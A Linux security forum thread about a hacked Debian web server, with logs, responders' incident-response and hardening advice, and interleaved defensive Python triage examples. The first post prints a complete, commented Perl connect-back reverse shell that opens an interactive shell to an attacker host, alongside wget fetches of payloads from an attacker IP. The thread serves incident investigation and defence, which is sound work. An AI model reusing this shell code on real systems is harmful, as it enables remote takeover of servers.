LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 09-11-2011, 01:55 PM   #1
Flowsen
LQ Newbie
 
Registered: Sep 2011
Posts: 29

Rep: Reputation: Disabled
Question Debian Lenny root server hacked with shellbot, any suggestions?


Dear community,
I am a new member of LinuxQuestions; unfortunately I have a huge problem and would like to hear your opinion on this.

My Debian Lenny root server was hacked last night. I have already searched through several posts and spent some hours investigating how the hacker came in and what he actually did.

errors.log
Quote:
--2011-09-10 20:52:30-- http://xxx.xxx.xxx.xxx/~PlcmSpIp/da1
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17205 (17K) [text/plain]
Saving to: `da1'

0K .......... ...... 100% 14.5K=1.2s

2011-09-10 20:52:32 (14.5 KB/s) - `da1' saved [17205/17205]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

6 17205 6 1171 0 0 3554 0 0:00:04 --:--:-- 0:00:04 3554
31 17205 31 5515 0 0 6681 0 0:00:02 --:--:-- 0:00:02 8758
56 17205 56 9859 0 0 5655 0 0:00:03 0:00:01 0:00:02 6144
100 17205 100 17205 0 0 6108 0 0:00:02 0:00:02 --:--:-- 6444
100 17205 100 17205 0 0 6107 0 0:00:02 0:00:02 --:--:-- 6444
sh: fetch: command not found
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
[Sat Sep 10 21:06:49 2011] [notice] mod_fcgid: process 20820 going graceful shutdown, sending SIGTERM
[Sat Sep 10 21:06:55 2011] [warn] mod_fcgid: process 20820 graceful shutdown timeouted, sending SIGKILL
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
I removed the IP address, because the malicious code is still there.
This was Backdoor.Perl.Shellbot.r.

There was another attack:
Quote:
Exception pexpect.ExceptionPexpect: ExceptionPexpect() in <bound method spawn.__del__ of <pexpect.spawn object at 0xb1fad0>> ignored
Exception pexpect.ExceptionPexpect: ExceptionPexpect() in <bound method spawn.__del__ of <pexpect.spawn object at 0xb1f9d0>> ignored
Exception pexpect.ExceptionPexpect: ExceptionPexpect() in <bound method spawn.__del__ of <pexpect.spawn object at 0xb1f9d0>> ignored
[Sat Sep 10 21:39:30 2011] [notice] mod_fcgid: process 21737 going graceful shutdown, sending SIGTERM
[Sat Sep 10 21:39:36 2011] [warn] mod_fcgid: process 21737 graceful shutdown timeouted, sending SIGKILL
--2011-09-10 21:49:26-- http://xxx.xxx.xxx.xxx/~PlcmSpIp/nc.txt
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 900 [text/plain]
Saving to: `nc.txt'

0K 100% 111M=0s

2011-09-10 21:49:27 (111 MB/s) - `nc.txt' saved [900/900]

^[0;31m[-] Conecktback Esuat^[0m

[Sat Sep 10 21:49:46 2011] [notice] mod_fcgid: process 23615 going graceful shutdown, sending SIGTERM
[Sat Sep 10 21:49:52 2011] [warn] mod_fcgid: process 23615 graceful shutdown timeouted, sending SIGKILL
--2011-09-10 21:50:48-- http://xxx.xxx.xxx.xxx/~PlcmSpIp/nc.txt
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 900 [text/plain]
Saving to: `nc.txt.1'

0K 100% 83.0M=0s

2011-09-10 21:50:48 (83.0 MB/s) - `nc.txt.1' saved [900/900]
Inside nc.txt and nc.txt.1 was the following Perl code:
Code:
#!/usr/bin/perl
# Connect-back ("reverse") shell as recovered from nc.txt. The Romanian strings
# are left as found, with translations in the comments. The ESC byte in front of
# every "[0;..m" colour code was lost in the forum paste; "\e" is assumed to be
# what the original contained (errors.log above shows it as "^[").
use Socket;
print "\n\e[0;33m[~] Incerc sa fac legatura =)\e[0m\n";   # "Trying to make the connection"
$host = $ARGV[0];        # attacker's listener, given on the command line
$port = 8080;            # default listener port
if ($ARGV[1]) {
  $port = $ARGV[1];
}
$proto = getprotobyname('tcp') || die("\e[0;31m[-] Nu merge treaba\e[0m\n\n");             # "It doesn't work"
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die("\e[0;31m[-] Eroare socket\e[0m\n\n");   # "Socket error"
my $target = inet_aton($host);
# Hand-packed sockaddr_in: AF_INET (2), port in network byte order, 4-byte
# address, 8 bytes of padding. Equivalent to sockaddr_in($port, $target).
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("\e[0;31m[-] Conecktback Esuat\e[0m\n\n");   # "Connect-back failed"; this is the line that ended up in errors.log
}
if (!fork()) {
  # Child: point stdin/stdout/stderr at the socket so the shell talks to the attacker.
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  print "[+] \e[0;32mConectback by \e[0;36msecure\e[0;32m ... private version =)\e[0m\n";
  # Disable shell history, fingerprint the host (kernel, uid, logged-in users),
  # then hand over an interactive /bin/sh. It runs as whoever launched the
  # script; here that was the web server user www-data (uid 33), see auth.log.
  system("unset HISTFILE; unset HISTSAVE ; uname -a ; id ; w ; echo \"[+] \e[0;32mTime to burn...\e[0m\";echo \"[+] \e[0;31mDo not fucking press Ctrl C\e[0m\"; /bin/sh -i");
  exit(0);
}
print "\e[0;32m[+] Conectback Reusit !\e[0m\n\n";   # "Connect-back succeeded"
messages.log
Quote:
Sep 10 21:54:03 srv kernel: [8592001.493553] NET: Registered protocol family 3
Sep 10 21:54:03 srv kernel: [8592001.535504] NET: Registered protocol family 4
Sep 10 21:54:03 srv kernel: [8592001.596601] NET: Registered protocol family 5
Sep 10 21:54:03 srv kernel: [8592001.670360] NET: Registered protocol family 9
Sep 10 21:54:03 srv kernel: [8592001.670360] X.25 for Linux Version 0.2
Sep 10 21:54:03 srv kernel: [8592001.739599] SCTP: Hash tables configured (established 65536 bind 65536)
auth.log
Quote:
Sep 10 21:17:28 srv su[22604]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/1 ruser=www-data rhost= user=root
Sep 10 21:17:30 srv su[22604]: pam_authenticate: Authentication failure
Sep 10 21:17:31 srv su[22604]: FAILED su for root by www-data
Sep 10 21:17:31 srv su[22604]: - pts/1 www-data:root
Sep 10 21:17:31 srv su[22606]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/1 ruser=www-data rhost= user=root
Sep 10 21:17:32 srv su[22606]: pam_authenticate: Authentication failure
Sep 10 21:17:32 srv su[22606]: FAILED su for root by www-data
Sep 10 21:17:32 srv su[22606]: - pts/1 www-data:root
Sep 10 21:17:32 srv su[22607]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/1 ruser=www-data rhost= user=root
Sep 10 21:17:35 srv su[22607]: pam_authenticate: Authentication failure
Sep 10 21:17:35 srv su[22607]: FAILED su for root by www-data
Sep 10 21:17:35 srv su[22607]: - pts/1 www-data:root
Quote:
Sep 10 22:59:25 srv su[15313]: Successful su for news by root
Sep 10 22:59:25 srv su[15313]: + pts/1 root:news
Sep 10 22:59:25 srv su[15313]: pam_unix(su:session): session opened for user news by (uid=0)
Some files with ctime changed on 10 Sep 21:56:

Quote:
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/rpm/sshOLD
/etc/rpm/sshdOLD

/opt/share
/opt/share/Ssh.bin
/opt/man/man5
/opt/man/man5/ssh_config.5
/opt/man/man5/sshd_config.5
/opt/man/man1
/opt/man/man1/scp.1
/opt/man/man1/ssh.1
/opt/man/man1/ssh-keygen.1
/opt/man/man1/ssh-agent.1
/opt/man/man1/sftp.1
/opt/man/man1/ssh-keyscan.1
/opt/man/man1/ssh-add.1
/opt/man/man1/slogin.1
/opt/man/man8
/opt/man/man8/sshd.8
/opt/man/man8/sftp-server.8
/opt/man/man8/ssh-keysign.8
/opt/libexec
/opt/libexec/sftp-server
/opt/libexec/ssh-keysign
/opt/bin
/opt/bin/ssh-keyscan
/opt/bin/sftp
/opt/bin/ssh
/opt/bin/scp
/opt/bin/slogin
/opt/bin/ssh-keygen
/opt/bin/ssh-agent
/opt/bin/ssh-add
/opt/sbin
/opt/sbin/sshd

/usr/share/phpmyadmin/scripts/setup.php
I am not sure if the attacker had complete root access, but he was able to change SSH settings, the port etc. At the moment I have the old system mounted from a second rescue system.
I am planning to restore a backup that was created before the attacks to ensure that there are no more backdoors open.
Anyway, I would like to hear your opinion: did the attacker have access to all data, or only to the Apache user's?

Furthermore I need to figure out which security hole I have to close after restoring the backup.
Is it an Apache2-related or a PHP-related issue?

If you need more information, logs, versions etc please let me know.

Kind Regards
Flowsen

Last edited by XavierP; 09-11-2011 at 06:29 PM. Reason: Moved to Linux-Security - where good security advice happens
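The three log fragments above each carry a different indicator: wget's own progress output inside Apache's error log (the stderr of a mod_fcgid child ends up there, which is why it looks like "terminal output"), the Romanian failure string of the connect-back script, and three `su` failures from uid 33 within four seconds. The following is an added example, not part of the original thread, that pulls those indicators out of the pasted lines. The sample log text is constructed from the post, with 192.0.2.10 standing in for the masked attacker IP; on a real case feed it the full error.log and auth.log.

```python
"""Triage of the error.log and auth.log fragments from the post above.

Added example, not part of the original thread. The sample lines are
constructed from the post (192.0.2.10 stands in for the masked attacker
IP); on a real case feed it the full /var/log/apache2/error.log and
/var/log/auth.log instead of these strings.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: what wget and the dropped shell wrote into Apache's error log.
ERROR_LOG = """\
--2011-09-10 20:52:30-- http://192.0.2.10/~PlcmSpIp/da1
Connecting to 192.0.2.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17205 (17K) [text/plain]
Saving to: `da1'
2011-09-10 20:52:32 (14.5 KB/s) - `da1' saved [17205/17205]
sh: fetch: command not found
[Sat Sep 10 21:06:49 2011] [notice] mod_fcgid: process 20820 going graceful shutdown, sending SIGTERM
--2011-09-10 21:49:26-- http://192.0.2.10/~PlcmSpIp/nc.txt
Saving to: `nc.txt'
2011-09-10 21:49:27 (111 MB/s) - `nc.txt' saved [900/900]
^[0;31m[-] Conecktback Esuat^[0m
"""

# Constructed sample: the su attempts from auth.log.
AUTH_LOG = """\
Sep 10 21:17:31 srv su[22604]: FAILED su for root by www-data
Sep 10 21:17:32 srv su[22606]: FAILED su for root by www-data
Sep 10 21:17:35 srv su[22607]: FAILED su for root by www-data
Sep 10 22:59:25 srv su[15313]: Successful su for news by root
"""

WGET_START = re.compile(r"^--(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)--\s+(\S+)")
WGET_SAVED = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")
# Fragments a web application never writes to error.log, but an interactive shell does.
SHELL_MARKERS = ("sh: ", "command not found", "kill: usage:", "Conecktback", "/bin/sh -i")
SU_LINE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ su\[\d+\]: (FAILED|Successful) su for (\S+) by (\S+)")


def find_downloads(lines):
    """Pair every wget '--<time>-- <url>' line with the 'saved' line that follows it."""
    found, pending = [], None
    for line in lines:
        m = WGET_START.match(line)
        if m:
            pending = {"time": m.group(1), "url": m.group(2), "saved_as": None, "bytes": None}
            found.append(pending)
            continue
        m = WGET_SAVED.search(line)
        if m and pending is not None:
            pending["saved_as"], pending["bytes"] = m.group(1), int(m.group(2))
            pending = None
    return found


def shell_output_lines(lines):
    """Lines that look like a shell session's stderr rather than Apache's own messages."""
    return [line for line in lines if any(marker in line for marker in SHELL_MARKERS)]


def su_activity(lines, year=2011, burst=3, window_s=60):
    """Count su failures per (from_user, to_user) and flag bursts as password guessing."""
    fails, successes = defaultdict(list), []
    for line in lines:
        m = SU_LINE.match(line)
        if not m:
            continue
        stamp, outcome, target, source = m.groups()
        if outcome == "FAILED":
            fails[(source, target)].append(datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S"))
        else:
            successes.append((source, target))
    guessing = []
    for pair, times in fails.items():
        times.sort()
        if any((times[i + burst - 1] - times[i]).total_seconds() <= window_s
               for i in range(len(times) - burst + 1)):
            guessing.append(pair)
    return {"failures": {p: len(t) for p, t in fails.items()},
            "guessing": guessing, "successes": successes}


if __name__ == "__main__":
    err = ERROR_LOG.splitlines()
    for d in find_downloads(err):
        print(f"{d['time']} fetched {d['url']} -> {d['saved_as']} ({d['bytes']} bytes)")
    for line in shell_output_lines(err):
        print("shell output in error.log:", line)
    print(su_activity(AUTH_LOG.splitlines()))
```

The timestamps are the pivot: the request that launched the shell has to sit in the vhost's access.log within a second or two of 20:52:30 (the first wget), and the `su` burst at 21:17 shows the shell was still running as www-data at that point, so whatever gave root came later than the web exploit.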
 
Old 09-12-2011, 09:34 AM   #2
Noway2
Senior Member
 
Registered: Jul 2007
Distribution: Gentoo
Posts: 2,125

Rep: Reputation: 781
Quote:
i am a new member to linuxquestions, unfortunately i have a huge problem and would like to hear your opinion on this.
We will be happy to help. That is what we are here for.
Quote:
My Debian Lenny root server was hacked last night. I already searched through several posts and spent some hours with investigating how the hacker came in and what he actually did.
It is good that you are investigating. If you haven't already, the first thing you will want to do is isolate this machine by either disconnecting the network cable or putting up a firewall to allow only SSH access from a trusted source. You will want to disturb it as little as possible.

The next thing you will want to do, is review the CERT intruder detection check list. It outlines the steps involved in an investigation and will help you to collect and co-ordinate your thoughts.

Since you have already begun your investigation, would you please outline what you have done so far and what steps you are considering performing? It looks like you have already begun looking through the logs and looking for modified files. This is good and your actions are to be commended! I will comment on the information you have provided and then provide some commands to run to obtain additional information.

From what you have posted so far:
I am not sure I fully understand the "errors.log". It does not look like log information that I am familiar with. Would you please elaborate?
Based upon what you have posted, it looks like someone may have gotten Apache to upload a file to your system, the nc.txt (nc - netcat?). It does look like Apache may have been the initial source of the intrusion, but try to keep an open mind while performing the investigation. It looks like they used the non-privileged account to then elevate to root, by password guessing. The logs shown indicate that they used the user news(?). Once they had a root privileged account, they were able to upload and modify files as desired, which it appears that they have done. The game was pretty well lost at this point. Consequently, your investigation should focus on what allowed them to gain access in the first place.

Now for some follow up questions:
1 - What distribution and revision / patch level are you running?
2 - What version of Apache are you running?
3 - What web applications are you using, e.g. PHP, and what version. Are you using any special content management applications, such as Joomla?
4 - What about remote administration tools (cpanel, plesk, mysqladmin, etc)?

I would like to ask you to obtain the output of the following commands, run as root: ps axfwwwwe, netstat -pane and lsof -Pwn. These will help to determine what applications, including counterfeit ones, are running on the system and what open connections the perpetrator is attempting.
 
1 members found this post helpful.
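Of the three commands Noway2 asks for, `netstat -pane` is the one that shows the connect-back directly: the Perl script above holds an ESTABLISHED socket to the attacker's host, owned by the web server uid, from a process whose name is an interpreter. The following is an added example, not part of the thread, that parses such output and flags those rows plus any listener the host is not supposed to have. The sample output is constructed in the net-tools column layout (Proto, Recv-Q, Send-Q, Local Address, Foreign Address, State, User, Inode, PID/Program name; UDP rows carry no State column and the User column is numeric because of `-n`); 192.0.2.10 stands in for the attacker's host and the expected listener set is an assumption for this host.

```python
"""Triage of 'netstat -pane' output for the sockets a connect-back shell creates.

Added example, not part of the original thread. NETSTAT below is a constructed
sample in the net-tools column layout; replace it with the real output.
"""
WEB_UID = 33                          # www-data on Debian
EXPECTED_LISTENERS = {22, 80, 3306}   # assumption: what this host is meant to serve
INTERPRETERS = {"perl", "python", "sh", "bash", "nc"}

NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      0          9213       1201/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      0          9870       1456/apache2
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      104        9400       1322/mysqld
tcp        0      0 10.0.0.5:80             198.51.100.7:51822      ESTABLISHED 33         22001      20820/apache2
tcp        0      0 10.0.0.5:47211          192.0.2.10:8080         ESTABLISHED 33         22150      23615/perl
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      0          23311      23900/sshd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           0          8100       987/dhclient
"""


def parse_netstat(text):
    """Turn each socket row into a dict; tolerates the missing State column of UDP rows."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if not f or f[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue
        has_state = f[0].startswith("tcp")
        state = f[5] if has_state else ""
        user, _inode, prog = f[6:9] if has_state else f[5:8]
        pid, _, name = prog.partition("/")
        rows.append({"proto": f[0], "local": f[3], "remote": f[4], "state": state,
                     "uid": int(user), "pid": pid, "prog": name})
    return rows


def port_of(addr):
    """Port of 'host:port'; None for the '*' wildcard."""
    port = addr.rsplit(":", 1)[1]
    return int(port) if port.isdigit() else None


def triage(rows):
    """Return (reason, row) pairs worth a closer look."""
    findings = []
    for r in rows:
        local_port = port_of(r["local"])
        if r["state"] == "LISTEN" and local_port not in EXPECTED_LISTENERS:
            findings.append(("unexpected listener", r))
        if r["state"] == "ESTABLISHED" and r["uid"] == WEB_UID and local_port not in EXPECTED_LISTENERS:
            # Apache answers on its own port; an outbound session from the web uid is a shell.
            findings.append(("outbound connection from web uid", r))
        if r["state"] == "ESTABLISHED" and r["prog"] in INTERPRETERS:
            findings.append(("interpreter holding a socket", r))
    return findings


if __name__ == "__main__":
    for reason, r in triage(parse_netstat(NETSTAT)):
        print(f"{reason}: pid {r['pid']} ({r['prog']}) uid {r['uid']} {r['local']} -> {r['remote']} {r['state']}")
```

Cross-check the PID of every flagged row against `ps axfwwwwe`: the environment printed by `-e` shows the parent chain and working directory of the shell, and `lsof -Pwn -p <pid>` shows the file it was started from. The second sshd on port 2222 is the kind of row the replaced OpenSSH under /opt/sbin would produce.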
Old 09-16-2011, 10:08 AM   #3
Flowsen
LQ Newbie
 
Registered: Sep 2011
Posts: 29

Original Poster
Rep: Reputation: Disabled
Thanks a lot for your reply.

What I did in the meantime:

I did isolate the machine, made a backup of all logs to be able to have a look at them at a later point of time.
Then i rolled back a backup of the whole machine to be sure to have it clean. After this I still had it disconnected from the web to be sure not to be infected again.
I checked the versions, and Apache as well as PHP were not up to date. I didn't get a notification, nor did update/upgrade work, because the sources pointed to the old Debian sources.

Now I have updated to:
apache2/lenny uptodate 2.2.9-10+lenny11
php5/lenny uptodate 5.3.8-1~dotdeb.1

I checked all open ports and files with the help of the CERT checklist/your commands and everything seems to be clean now. Furthermore I have chkrootkit and rkhunter running as a cron job, at the moment hourly. SSH is only bound to a secured VPN IP at the moment.

Quote:
I am not sure I fully understand the "errors.log". It does not look like log information that I am familiar with. Would you please elaborate?
Yes, the Apache error log is really confusing. The log shows everything correctly line by line, and suddenly some file is being downloaded (and executed). It must have been an exploit in Apache, maybe together with a security hole in PHP.

You asked if something like a CMS, Joomla etc. is running. I have a lot of things on this webserver (Joomla, Magento, Mahara, Moodle, WordPress, phpBB, Burning Board etc.).
After updating PHP I also began to configure separate PHP settings for each domain.

Is there a PHP tool to check for common errors or insecure settings? I saw there was a project called PHPSecInfo that gives output like phpinfo but with recommendations on security settings. PHPSecInfo is dated 2006, so this one is useless.
 
1 members found this post helpful.
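For the php.ini check asked about above, the directives that matter in this incident are few: `allow_url_include`/`allow_url_fopen` are what a remote file inclusion needs, `disable_functions` decides whether an included script can call `system()` and start the wget that appears in errors.log, and `open_basedir` limits where it can read. The following is an added example, not from the thread and not a PHP project tool, that reads a php.ini and lists the weak settings next to the recommended value; the two ini texts are constructed, the weak one with the permissive values an unmaintained 5.x install tends to keep, the hardened one as the target. Point it at /etc/php5/apache2/php.ini or at each vhost's `php_admin_value` overrides.

```python
"""php.ini audit for the directives that matter in the compromise above.

Added example, not part of the original thread or of any PHP tool. WEAK_INI
and HARDENED_INI are constructed; load_php_ini() reads a real file.
"""
# Functions an included script would use to run wget/perl; the set to disable.
DANGEROUS_FUNCS = {"exec", "system", "shell_exec", "passthru", "popen", "proc_open"}
# PHP's built-in defaults when a directive is absent from php.ini.
PHP_DEFAULTS = {"allow_url_fopen": "On", "allow_url_include": "Off", "register_globals": "Off",
                "display_errors": "On", "expose_php": "On"}

WEAK_INI = """\
[PHP]
; constructed sample: permissive settings
allow_url_fopen = On
allow_url_include = On
register_globals = On
display_errors = On
expose_php = On
disable_functions =
open_basedir =
"""

HARDENED_INI = """\
[PHP]
; constructed sample: recommended settings for a multi-site web host
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
display_errors = Off
expose_php = Off
disable_functions = exec,system,shell_exec,passthru,popen,proc_open
open_basedir = /var/www:/tmp
"""


def parse_php_ini(text):
    """Minimal php.ini reader: drops ';' comments and [sections], lowercases keys.

    Good enough for the directives checked here; quoted values containing ';'
    would need the real parser.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def load_php_ini(path):
    with open(path, encoding="utf-8", errors="replace") as f:
        return parse_php_ini(f.read())


def php_bool(value):
    """PHP's ini boolean rules: 1/On/True/Yes are true, anything else is false."""
    return value.strip().lower() in {"1", "on", "true", "yes"}


def audit_php_ini(settings):
    """Return (directive, value found, recommended value) for every unsafe directive."""
    findings = []
    for directive in ("allow_url_include", "allow_url_fopen", "register_globals",
                      "display_errors", "expose_php"):
        value = settings.get(directive, PHP_DEFAULTS[directive])
        if php_bool(value):
            findings.append((directive, value, "Off"))
    disabled = {f.strip() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(DANGEROUS_FUNCS - disabled)
    if missing:
        findings.append(("disable_functions", ",".join(sorted(disabled)) or "(empty)",
                         "add " + ",".join(missing)))
    if not settings.get("open_basedir"):
        findings.append(("open_basedir", "(empty)", "restrict to the docroot and a tmp dir"))
    return findings


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{name}: {audit_php_ini(parse_php_ini(ini)) or 'no findings'}")
```

`allow_url_fopen` is the one directive some applications legitimately need (feed readers, update checks); if a site on the host needs it, keep it Off globally and enable it per vhost. `register_globals` only exists up to PHP 5.3, the version installed here; it is gone in 5.4.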
Old 09-16-2011, 10:35 AM   #4
Noway2
Senior Member
 
Registered: Jul 2007
Distribution: Gentoo
Posts: 2,125

Rep: Reputation: 781
If you were running out-of-date applications, it is entirely possible that there was a vulnerability that was exploited. It sounds like you had a remote file inclusion attack, of which there have been cases with Apache. Keeping your PHP, Apache and all content management applications up to date is one of the best things that you can do. It is unfortunate, but the cracking tools can identify the version you are running and then use automated attack scripts to drop the intruder into a shell prompt. From there, one of your next best protections is to use a very good password on root and sudo privileged accounts.

If you are wanting to put this new system back on line, I would also recommend that you look into a host based intrusion detection system, such as Ossec, Tripwire, Aide, Samhain, etc. These will take a snapshot of your system and alert you via email if any critical files get changed or if there is other unusual activity.

Since you at least have the log files, you should be able to review those for signs of the intrusion. Speaking of which, what did you find from the check list regarding unlawful applications, binaries, and modifications?
 
1 members found this post helpful.
Old 09-16-2011, 12:41 PM   #5
OlRoy
Member
 
Registered: Dec 2002
Posts: 306

Rep: Reputation: 86
You never really posted all the information Noway2 requested.

Quote:
Now for some follow up questions:
1 - What distribution and revision / patch level are you running?
2 - What version of Apache are you running?
3 - What web applications are you using, e.g. PHP, and what version. Are you using any special content management applications, such as Joomla?
4 - What about remote administration tools (cpanel, plesk, mysqladmin, etc)?

I would like to ask you to obtain the output of the following commands, run as root: ps axfwwwwe, netstat -pane and lsof -Pwn. These will help to determine what applications, including counterfeit ones, are running on the system and what open connections the perpetrator is attempting.
In addition, I think the answer to how the attacker got access can be found in the access.log. If you can post the logs from around the time the attack happened, you will probably find something like the RFI attack that Noway2 suspected.

Last edited by OlRoy; 09-16-2011 at 12:42 PM.
 
Old 09-21-2011, 09:56 AM   #6
Flowsen
LQ Newbie
 
Registered: Sep 2011
Posts: 29

Original Poster
Rep: Reputation: Disabled
Dear OlRoy,

I never posted all the requested outputs as it was useless at this point. I had already rolled back a backup of the whole system, as removing and patching an already infected system was not a secure way for me.
As I already said, I was out of date with Apache2 and PHP. I searched through all Apache access and error logs but wasn't able to find a suitable log entry. It seems like the exploit wasn't logged. As you can see in the Apache error log I posted, all of a sudden a terminal output appears.

I have my system up and running again, focusing on being up to date and monitoring everything right now.

The intrusion detection systems Noway2 mentioned are a good idea; I will focus on that, too. Do you have a suggestion which of these systems you would recommend?

Kind Regards
Flowsen
 
Old 09-22-2011, 08:29 AM   #7
Noway2
Senior Member
 
Registered: Jul 2007
Distribution: Gentoo
Posts: 2,125

Rep: Reputation: 781
It is unfortunate that you didn't complete the investigation. You may have been able to conclusively verify how you were compromised as well as gain a lot of experience with some of the less common aspects of Linux administration. I can also understand why you proceeded the way you did. The out of date applications more than likely at least contributed to or exacerbated the situation. In any case, the important thing will be for you to remain extra vigilant going forward and you will need to keep an extra close watch on your system to be sure you don't become compromised again.

As far as suggestions of what to do, there have been a few threads in the security forum regarding this subject. Here is a fairly recent one: http://www.linuxquestions.org/questi...achine-891764/

The most important thing is to start with a known clean system. Following that, here are some more suggestions: Only install the services you really need and avoid opening ports that you don't require. Apply your security in layers and keep in mind that you need to focus on each application individually. For example, for SSH don't permit direct root logins, use key based authentication (with a password on the key). At the general level, use a good, strong root password or better, pass phrase. In the event of a compromise this could be your final line of defense making the difference between recovery and reformat. Use iptables as a wrapper layer to ensure that your ports remain closed. Use SELinux or AppArmor to enforce an access control policy further restricting the reading/writing to directories. Use the HIDS as previously mentioned to monitor for changes. Use Logwatch to scan your logs and provide you with a daily summary of what is happening. Use applications like fail2ban and other active response tools that will shut down errant connections and dramatically slow down a would-be intruder. For Apache learn and use mod_security, which will provide an active response to many forms of attacks. Make use of chroot environments where applicable, especially for services like DNS and email.

In time, you will also become aware of the general "hum" of your system and get used to how it responds as well as its unique behaviors. If something feels out of the ordinary, pay attention to this and do some extra checks to see what has changed.
 
1 members found this post helpful.
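The HIDS recommended above (OSSEC, Tripwire, AIDE, Samhain) all come down to one mechanism: a baseline of content hashes and metadata for the files that should not change, compared against the live system on a schedule. The following is an added example, not from the thread and not any of those tools, that implements that mechanism in a few functions and replays the two changes from the first post, the edited /etc/ssh/sshd_config and the sshd dropped under /opt/sbin, inside a temporary directory so it runs without touching the real system. Paths, file contents and the setuid mode on the dropped binary are constructed for the demo.

```python
"""Minimal file-integrity baseline in the spirit of AIDE/Tripwire/Samhain.

Added example, not part of the original thread or of any of those tools.
snapshot() hashes every regular file under the given roots, compare()
reports what changed, and demo() builds a throwaway tree under a temp
directory to show the two changes described in the first post.
"""
import hashlib
import json
import os
import stat
import tempfile


def file_record(path):
    """Content hash plus the metadata a replaced binary or edited config tends to alter."""
    st = os.lstat(path)
    h = hashlib.sha256()
    if stat.S_ISREG(st.st_mode):
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
    return {"sha256": h.hexdigest(), "mode": oct(stat.S_IMODE(st.st_mode)),
            "uid": st.st_uid, "size": st.st_size}


def snapshot(roots):
    """Walk the roots and record every regular file; symlinks are recorded by target name only."""
    baseline = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                p = os.path.join(dirpath, name)
                if not os.path.islink(p):
                    baseline[p] = file_record(p)
    return baseline


def compare(baseline, current):
    """Classify paths as added, removed or modified (any recorded field differs)."""
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in both if baseline[p] != current[p]),
    }


def demo():
    """Baseline a fake /etc/ssh and /opt, then apply the changes seen in the post."""
    with tempfile.TemporaryDirectory() as tmp:
        etc_ssh = os.path.join(tmp, "etc", "ssh")
        opt_sbin = os.path.join(tmp, "opt", "sbin")
        os.makedirs(etc_ssh)
        os.makedirs(opt_sbin)
        roots = [os.path.join(tmp, "etc"), os.path.join(tmp, "opt")]
        cfg = os.path.join(etc_ssh, "sshd_config")
        with open(cfg, "w") as f:
            f.write("Port 22\nPermitRootLogin no\n")          # constructed baseline config
        baseline = snapshot(roots)

        # Attacker edits sshd_config and drops a second sshd under /opt/sbin.
        with open(cfg, "w") as f:
            f.write("Port 2222\nPermitRootLogin yes\n")
        rogue = os.path.join(opt_sbin, "sshd")
        with open(rogue, "wb") as f:
            f.write(b"\x7fELF constructed placeholder, not a real binary\n")
        os.chmod(rogue, 0o4755)                               # setuid root, as a planted daemon often is

        diff = compare(baseline, snapshot(roots))
        # Report paths relative to the temp root so the result does not depend on the tmp name.
        return {k: [os.path.relpath(p, tmp) for p in v] for k, v in diff.items()}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two caveats follow from the incident itself. The baseline has to live where the monitored host cannot rewrite it (read-only media or another machine), because once the attacker has root, as here, anything stored locally can be regenerated to match the tampered files. And a userland checker only sees what the kernel shows it; after a root compromise the real answer is the one Noway2 gives, rebuild from known-good media, and use the checker to protect the rebuilt system, not to certify the old one.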
Old 09-22-2011, 08:56 AM   #8
Flowsen
LQ Newbie
 
Registered: Sep 2011
Posts: 29

Original Poster
Rep: Reputation: Disabled
Thank you for your reply on this.
I have already checked some of the points you mentioned and will focus on the other things in your post that I have not already done, to increase the security level.
SSH is currently only available through a VPN connection, which is protected by SSL and key pairs.
 
  

